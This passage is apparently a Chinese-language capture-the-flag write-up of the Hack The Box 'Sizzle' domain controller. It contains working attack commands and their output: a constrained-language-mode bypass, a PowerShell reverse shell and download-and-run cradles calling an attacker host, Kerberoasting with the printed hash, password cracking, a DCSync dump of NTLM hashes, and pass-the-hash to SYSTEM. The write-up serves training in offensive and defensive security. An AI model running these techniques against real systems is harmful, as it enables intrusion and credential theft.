+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
*Evil-WinRM* PS C:\users\public> cd ..
*Evil-WinRM* PS C:\users> 我还可以看到有一个sizzler用户:
*Evil-WinRM* PS C:\users> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator amanda DefaultAccount
Guest krbtgt mrlky
sizzler
The command completed with one or more errors.我尝试去传送一个winPEAS,但我会受AppLocker限制:
*Evil-WinRM* PS C:\Users\amanda\desktop> wget http://10.10.16.7/winPEASx86.exe -O winPEASx86.exe
*Evil-WinRM* PS C:\Users\amanda\desktop> ls
Directory: C:\Users\amanda\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/23/2022 10:21 PM 1936384 winPEASx86.exe
*Evil-WinRM* PS C:\Users\amanda\desktop> ./winPEASx86.exe
Program 'winPEASx86.exe' failed to run: This program is blocked by group policy. For more information, contact your system administratorAt line:1 char:1
+ ./winPEASx86.exe
+ ~~~~~~~~~~~~~~~~.
At line:1 char:1
+ ./winPEASx86.exe
+ ~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
*Evil-WinRM* PS C:\Users\amanda\desktop> wget http://10.10.16.7/winPEAS.bat -O winPEAS.bat
*Evil-WinRM* PS C:\Users\amanda\desktop> ls
Directory: C:\Users\amanda\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/23/2022 10:23 PM 35766 winPEAS.bat
-a---- 4/23/2022 10:21 PM 1936384 winPEASx86.exe
*Evil-WinRM* PS C:\Users\amanda\desktop> ./winPEAS.bat
winPEAS.bat : This program is blocked by group policy. For more information, contact your system administrator.
+ CategoryInfo : NotSpecified: (This program is... administrator.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:\Users\amanda\desktop> 没什么特殊权限,也没什么特殊组:
*Evil-WinRM* PS C:\Users\amanda\desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\amanda\desktop> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
*Evil-WinRM* PS C:\Users\amanda\desktop>我想通过Metasploit来帮我自动枚举一些能供我提权的信息,但我的powershell似乎也是受限的:
*Evil-WinRM* PS C:\Users\amanda\desktop> IEX ((new-object net.webclient).downloadstring('http://10.10.16.7/shell.ps1'))
Cannot create type. Only core types are supported in this language mode.
At line:1 char:7
+ IEX ((new-object net.webclient).downloadstring('http://10.10.16.7/she ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (:) [New-Object], PSNotSupportedException
+ FullyQualifiedErrorId : CannotCreateTypeConstrainedLanguage,Microsoft.PowerShell.Commands.NewObjectCommand
*Evil-WinRM* PS C:\Users\amanda\desktop>Poershell受限语言模式已启用,它不允许我加载其他模块:
*Evil-WinRM* PS C:\Department Shares\users\public> $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage关于这个我在谷歌找到了这篇文章,我可以通过降级版本来绕过该限制:
https://www.ired.team/offensive-security/code-execution/powershell-constrained-language-mode-bypass当前powershell版本是:
Evil-WinRM* PS C:\Users\amanda>$psversiontable
Name Value
---- -----
PSVersion 5.1.14393.2636
PSEdition Desktop
PSCompatibleVersions {1.0, 2.0, 3.0, 4.0...}
BuildVersion 10.0.14393.2636
CLRVersion 4.0.30319.42000
WSManStackVersion 3.0
PSRemotingProtocolVersion 2.3
SerializationVersion 1.1.0.1
*Evil-WinRM* PS C:\Users\amanda>我可以使powershell版本2来绕过这个限制,因为:
*Evil-WinRM* PS C:\Department Shares\users\public> powershell -v 2 -c $ExecutionContext.SessionState.LanguageMode
FullLanguage我可以尝试加载我的载荷,我的http服务确实监听到了目标加载了我的载荷,但是我的会话并没有回连,或许是MSF的载荷需要高版本点的powershell:
*Evil-WinRM* PS C:\> powershell -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.7/shell.ps1')"
*Evil-WinRM* PS C:\>但是我尝试生成shell.exe并通过smb共享传送过去时:
smb: \Users\Public\> ls
. D 0 Sun Apr 24 10:55:38 2022
.. D 0 Sun Apr 24 10:55:38 2022
7779839 blocks of size 4096. 3571474 blocks available
smb: \Users\Public\> put shell.exe
putting file hack.exe as \Users\Public\shell.exe (39.4 kb/s) (average 39.4 kb/s)
smb: \Users\Public\> SMBecho failed (NT_STATUS_CONNECTION_RESET). The connection is disconnected now
在我执行载荷时:
*Evil-WinRM* PS C:\Department Shares\users\public> ls
Directory: C:\Department Shares\users\public
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/23/2022 10:55 PM 73802 shell.exe
*Evil-WinRM* PS C:\Department Shares\users\public> ./shell.exe
Program 'shell.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted softwareAt line:1 char:1
+ ./shell.exe
+ ~~~~~~~~~~~.
At line:1 char:1
+ ./shell.exe
+ ~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
*Evil-WinRM* PS C:\Department Shares\users\public> Program 'shell.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted softwareAt
程序'shell.exe'运行失败:操作未能成功完成,因为文件包含病毒或可能不需要的软件。
我以为又是哪位同僚的恶作剧,我重置了一下环境,发现还是这样。或许目标真的有杀软防护程序,但我并不清楚目标到底运行了什么防护程序。因为在进程列表中我看不出来,我尝试使用Evil-WinRM绕过恶意软件检测,但是我失败了,因为我的powershell被限制了,而我无法指定powershell 2 来加载这个模块:
*Evil-WinRM* PS C:\Department Shares\users\public> Bypass-4MSI
Cannot invoke method. Method invocation is supported only on core types in this language mode.
At line:1 char:1
+ [RuNtIME.InTeROPSErviCEs.MaRShal]::WriTeBytE([ReF].AssEmBlY.GETType(" ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : MethodInvocationNotSupportedInConstrainedLanguage
*Evil-WinRM* PS C:\Department Shares\users\public> 我尝试了对我的powershell载荷进行了编码,但是传入过去依旧被杀软给干掉了:
*Evil-WinRM* PS C:\Users\amanda> Invoke-WebRequest http://10.10.16.7/shell.ps1 -outfile shell.ps1
*Evil-WinRM* PS C:\Users\amanda> powershell -version 2 -nop -nop -noexit -exec bypass -c '.\shell.ps1'
powershell.exe : .\shell.ps1 : Operation did not complete successfully because the file contains a virus or potentially unwanted softwarPowershell的免杀当前我并没有掌握,但是如果我生成了exe免杀载荷,又会被AppLocker拦截掉。
域侦测:
目前我对于目标知道的信息太少了,我希望Bloodhound能帮我枚举出更多的信息,虽然目标上会有种种限制,但是我有python版本的远程bloodhound:
$ python3 bloodhound.py -d HTB.local -u 'Amanda' -p 'Ashare1972' -c all -ns 10.10.10.103
INFO: Found AD domain: htb.local
INFO: Connecting to LDAP server: sizzle.HTB.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: sizzle.HTB.LOCAL
WARNING: Could not resolve SID: S-1-5-21-2379389067-1826974543-3574127760-1000
INFO: Found 8 users
INFO: Connecting to GC LDAP server: sizzle.HTB.LOCAL
INFO: Found 53 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: sizzle.HTB.LOCAL
INFO: User Guest is logged in on sizzle.HTB.LOCAL from 10.10.17.130
WARNING: Could not resolve hostname to SID: 10.10.17.130
INFO: Done in 00M 39S我可以选择预查询Find Principals with DCSync Rights:
用户MRLKY@HTB.LOCAL在域HTB.LOCAL上具有DS-Replication-Get-Changes权限。
单独来说,这条边缘不授予执行攻击的能力。但是,与DS-Replication-Get-Changes-All一起,主体可能执行DCSync攻击。
刚好DS-Replication-Get-Changes与DS-Replication-Get-Changes-All,MRLKY用户都具备,我可以通过MRLKY用户发起DCSync攻击,但是目前我并没有MRLKY用户的任何凭证。或许会在缓存中有MRLKY用户的哈希,但是88端口我并没有探测到。
我觉得它的88端口是开着的,运行着kerberos协议,只是被人为的隐藏了,因为88端口处于监听状态:
*Evil-WinRM* PS C:\Users\amanda> netstat -aon -p tcp | findstr "88"
TCP 0.0.0.0:88 0.0.0.0:0 LISTENING 612
TCP 0.0.0.0:49688 0.0.0.0:0 LISTENING 612
*Evil-WinRM* PS C:\Users\amanda> tasklist | findstr 612
tasklist.exe : ERROR: Access denied
+ CategoryInfo : NotSpecified: (ERROR: Access denied:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:\Users\amanda> 或许作者不希望我从外部访问到它,或许我可以通过代理转发访问到它,我第一时间想到的是生成Meterpreter会话然后建立代理转发服务,规避杀软我可以做到,但是AppLocker绕过我了解的并不多。我找到了如下工具:
https://github.com/GreatSCT/GreatSCT但是它安装太慢了,而且安装还没成功。
获取Powershell 2 版本的shell:
我可以尝试基于powershell 2 版本反弹一个shell,因为powershell 2 没有开启受限的语言环境。而且如果在Evil-WinRM我需要每次都指定powershell版本,为了节省一些不必要的麻烦。我会在本地创建shell.ps1,内容如下,我估计杀软应该不会拦截,因为它并不包含shellcode:
$client = New-Object System.Net.Sockets.TCPClient("10.10.16.7",3333);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()然后通过远程加载并指定powershell 2 版本执行:
*Evil-WinRM* PS C:\Users\amanda> Invoke-WebRequest http://10.10.16.7/shell.ps1 -outfile shell.ps1
*Evil-WinRM* PS C:\Users\amanda> powershell -version 2 -nop -nop -noexit -exec bypass -c '.\shell.ps1'我可以如愿收到会话:
$ nc -lvnp 3333
listening on [any] 3333 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.103] 54489
whoami
htb\amanda
PS C:\Users\amanda> 获取MRLKY账户凭证:
接下来我可以很方便的执行powershell指令,但是我并不能运行载荷,因为会被杀软干掉,但是我可以尝试加载PowerView:
PS C:\Users\amanda> IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.7/PowerView.ps1')
PS C:\Users\amanda> ls
Directory: C:\Users\amanda
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r-- 12/2/2018 5:09 PM Contacts
d-r-- 4/23/2022 10:23 PM Desktop
d-r-- 12/2/2018 5:09 PM Documents
d-r-- 12/2/2018 5:09 PM Downloads
d-r-- 12/2/2018 5:09 PM Favorites
d-r-- 12/2/2018 5:09 PM Links
d-r-- 12/2/2018 5:09 PM Music
d-r-- 12/2/2018 5:09 PM Pictures
d-r-- 12/2/2018 5:09 PM Saved Games
d-r-- 12/2/2018 5:09 PM Searches
d-r-- 12/2/2018 5:09 PM Videos
-a--- 4/24/2022 12:44 AM 0 info.txt
-a--- 4/24/2022 1:52 AM 501 shell.ps1
PS C:\Users\amanda> Get-NetDomain
Forest : HTB.LOCAL
DomainControllers : {sizzle.HTB.LOCAL}
Children : {}
DomainMode :
Parent :
PdcRoleOwner : sizzle.HTB.LOCAL
RidRoleOwner : sizzle.HTB.LOCAL
InfrastructureRoleOwner : sizzle.HTB.LOCAL
Name : HTB.LOCAL
PS C:\Users\amanda> 我可以使用power shell将当前用户amanda添加凭据支持,这样我就可以通过当前用户导出目标内部中的哈希凭据:
PS C:\Users\amanda> $Password = ConvertTo-SecureString 'Ashare1972' -AsPlainText -Force
PS C:\Users\amanda> $Cred = New-Object System.Management.Automation.PSCredential('HTB.LOCAL\amanda', $Password)然后我根据以下文档的指示:
https://powersploit.readthedocs.io/en/latest/Recon/Invoke-UserImpersonation/使用 PowerView 的Invoke-UserImpersonationm模块:
PS C:\Users\amanda> Invoke-UserImpersonation -Credential $Cred
1444
PS C:\Users\amanda> Invoke-Kerberoast
SamAccountName : mrlky
DistinguishedName : CN=mrlky,CN=Users,DC=HTB,DC=LOCAL
ServicePrincipalName : http/sizzle
TicketByteHexStream :
Hash : $krb5tgs$23$*mrlky$HTB.LOCAL$http/sizzle*$828F1EE80C7616BBB6D25FD14D3F753B$5C690D71DBFFBDB0F8A0F
63DBCD08CAD156221154029182E03870DCF5D3F92256445530BF6B2695B338361DB5C3AAC2A9580C3EADF5B0329FE3BA
978E53B824DA9FB64CC218D2717F236D840EE59E0C1ABD3359D2189CA050F0B3F014E056CD144A4148EB9E81B546387D
D037DF96F22FD97DC61771E1E038001FD2AEA9DE21B3E36383F9D55AC7FC152B03D605656A143BE3CBA3A1173A5FE8E0
593A1DA3F9F8D917A65B697C553834CB8F2B63FF7DC5B07827DA299704CED9DF116B397EAC3166D3E0DC2B3B1A130CFE
A6213ECD3188AD6C1B794CE5BC29FDF56E943B4419724FEF69B6FE54F2D7939760FC7E4F59D3C07742BF51D0EE832F60
3A13F6417F7F954E1295A61D36619E5B541229DD9EA019403E93E0F2996B4EA53410C6354F5BFFC98AF4C8CE43E53DC6
9A9564BD09CA3E393C94EB9E4A13944BFC25740EFF00E4F1B112E81B7C039298656770BB1FD292BBE48CBB3B143EF547
65F3D73A2B85D2E4452DECA69B6879D31C32131848398FA171E39312FA86ABCBE7EE4938052B2C3C4103917023392071
971E0CFBCE17E959881BA493279C48EA474223B7FD5D6A748BF49DD2871BFF1698D3D57D449084396BB4B7A0DE98A7CE
0F5FBA120C58859FBC3A673619E7B2DD07833565C5698DC6361C58B78419729E4BC94E1A493FC4462D7225DAE246E292
6E1A5123C9FBEB429171C9A0249401A8A2AD4406700B20B132FE18D3749CF26F5C0BD99DFAFA1D248ED572A943475A0F
E17822B6033BD65647C1FB343F9536F00FC23C8D14EA430A782FF82865C2F9E402FBD653162DBED79F58B6A815E9C88F
7EF8E4346BC5BF0F38ABFF1B9609562D89139817EFB096C9E8DA9B7569A2E734E9AF37680224031C99AF7E48A97EA7F0
449977511B69B5B3583B618FD39A620A8C86044B1FF347A51DADE1E851FC31375A68CDD73C6A925C6041F86B35CDA57A
8A063B769D932118A5A5B21DF6A8348FD2F5625F4B005273752D5C6D490353E69719EBB5B4FE7DF8DFCDE278F82C4E6D
D55E9C7778CF582A377C42B2B0F43F1F61474C5D0EAAE02D3717507642BAEC9C3A673F9F1D6F28E41B449957AAAB9FF0
4D23F901BAE9C83133288FFA9EADDDF726C076B2E4B6BDDEA616069EBE97EDF44BB84A084B05936E7CF82D888EECC12E
8409E138FA8729CD51F625ABB7E81CB52425AF4C9BE7ECC1A6FF2A777A964A5A96337CDFE64CDB81B1AFDC2DC6D5B04E
11E52C7F9EC290D624DCAE44277B02B4AA7F003B26E5E726E7312D0FCCDA97E31ED8E8B87858039E8786FDE32EE8EF23
7C425B6B5E1B983926D3E4F9405DA41A35976B001DDDDAEA3246BEF5FD188A810BCE54304466183C4E5807161E2B8C04
1C9CADC6D1712125A57B9CD8CEEF4D544F542128CA74CD7
PS C:\Users\amanda> 这样我就获取到了mrlky账户的TGS凭证,为什么是TGS我还愣了一下,或许mrlky是一个服务账户,我可以将其复制到本地对其进行暴力猜解,但是在猜解前,TGS凭证需要处理一下:
空格需要替换为空,http/sizzle中间的 / 需要去掉,票据中不应该有这些东西。不过处理后的票据hashcat会破解不出来,但是john还是为我猜解出来一个可能的口令Football#7:
$ john -w=/usr/share/wordlists/rockyou.txt --fork=4 ./hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Node numbers 1-4 of 4 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
Football#7 (?)
2 1g 0:00:00:04 DONE (2022-04-24 14:35) 0.2178g/s 608237p/s 608237c/s 608237C/s Footie123..Foh9iyd=,r^j
4 0g 0:00:00:05 DONE (2022-04-24 14:35) 0g/s 611934p/s 611934c/s 611934C/s cxz..*7¡Vamos!
1 0g 0:00:00:05 DONE (2022-04-24 14:35) 0g/s 610893p/s 610893c/s 610893C/s Jakekovac3.ie168
Waiting for 3 children to terminate
3 0g 0:00:00:05 DONE (2022-04-24 14:35) 0g/s 608817p/s 608817c/s 608817C/s 0125457423 .a6_123
Session completed.获取目标system权限:
验证这个口令很简单,因为Bloodhound已经告诉了我mrlky可发动DCsync攻击,我可以通过impacket secretsdump.py来转储目标NTDS.dit,而且我根本不需要去考虑目标88端口kerberos不对外开放这些因素,因为secretsdump.py走的不是88端口,走的是RPC:
./secretsdump.py htb.local/mrlky:Football#7@10.10.10.103
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:296ec447eee58283143efbd5d39408c8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
amanda:1104:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3:::
mrlky:1603:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
sizzler:1604:aad3b435b51404eeaad3b435b51404ee:d79f820afad0cbc828d79e16a6f890de:::
SIZZLE$:1001:aad3b435b51404eeaad3b435b51404ee:53fc6612a610627883a22dcddce94afd:::这样我就可以通过PTH移动到目标中:
$ ./psexec.py Administrator@10.10.10.103 -hashes aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267 -no-pass
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.10.103.....
[*] Found writable share ADMIN$
[*] Uploading file hoFhbszJ.exe
[*] Opening SVCManager on 10.10.10.103.....
[*] Creating service YMDn on 10.10.10.103.....
[*] Starting service YMDn.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> 我有了user.txt:
C:\Users\mrlky\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 9C78-BB37
Directory of C:\Users\mrlky\Desktop
07/10/2018 06:24 PM <DIR> .
07/10/2018 06:24 PM <DIR> ..
04/23/2022 02:36 AM 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 14,616,612,864 bytes free
C:\Users\mrlky\Desktop> type user.txt也有了root.txt:
C:\Users\administrator> cd desktop
C:\Users\administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 9C78-BB37
Directory of C:\Users\administrator\Desktop
02/11/2021 08:29 AM <DIR> .
02/11/2021 08:29 AM <DIR> ..
04/23/2022 02:36 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 14,616,563,712 bytes free
C:\Users\administrator\Desktop> type root.txt